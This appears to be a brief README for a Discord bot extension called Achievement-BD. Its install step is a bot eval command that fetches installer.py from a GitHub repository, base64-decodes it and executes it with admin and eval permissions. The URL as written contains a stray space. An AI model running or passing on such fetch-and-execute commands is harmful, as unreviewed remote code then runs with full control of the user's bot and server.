ContestedWheel/Achievement-BD/README.md

 Run
 `{prefix}.eval import base64, requests; await ctx.invoke(bot.get_command("eval"), body=base64.b64decode(requests.get("https://api.github.com/repos/Mitoooooooopo/Achievement-BD /Package/contents/installer.py").json()["content"]).decode())`

 In a discord server where you have admin and eval permissions (if this command throws an error just use the manual way)

+# FEEL FREE To Edit the code Fix mistakes or use anywhere If you get any issues regarding the code contact me in discord Or create a pull Request in this repository